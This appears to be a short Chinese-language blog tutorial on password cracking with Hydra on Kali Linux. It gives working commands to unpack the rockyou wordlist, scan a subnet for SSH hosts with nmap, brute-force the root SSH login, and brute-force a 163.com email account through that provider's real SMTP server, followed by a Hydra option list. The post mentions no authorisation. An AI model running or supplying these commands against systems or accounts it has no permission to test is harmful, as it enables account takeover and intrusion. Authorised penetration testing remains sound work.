使用Hydra通过ssh破解密码

 

 

Kail Linux有一个的GUI版本：xhydra，也有一个命令行版本：hydra。

xhydra：

hydra：

我使用命令行版本：hydra

 

字典

这种攻击需要字典文件，一个好的字典至关重要。我以Kali Linux自带的rockyou字典为例，位于/user/share/wordlists/rockyou.txt.gz。

使用前先解压：

 

 gzip -d /usr/share/wordlists/rockyou.txt.gz

 

nmap确定开启ssh服务的主机

 

nmap -p 22 -open -sV 172.16.1.1/24

 

 

 暴力破解

 

hydra -s 22 -v -l root -P /usr/share/wordlists/rockyou.txt 192.168.0.108 ssh

 

 

爆破邮箱密码

 

hydra -S -l test@163.com -P /usr/share/wordlists/rockyou.txt -e ns -V -s 465 -t 1 smtp.163.com smtp

 

下面贴一个用法

 

hydra用法：  
hydra <参数> <IP地址> <服务名>  
hydra的参数是区分大小写的.  
hydra支持的服务有:telnet ftp ssh mysql mssql vnc pcanywhere RDP(3389)等.  
hydra的一些参数:  
-R 继续从上一次的进度开始爆破  
-s <port> 指定端口  
-l <username> 指定登录的用户名  
-L <username-list> 指定用户名字典  
-p <password> 指定密码  
-t <number> 设置线程数  
-P <passwd-list> 指定密码字典  
-v 显示详细过程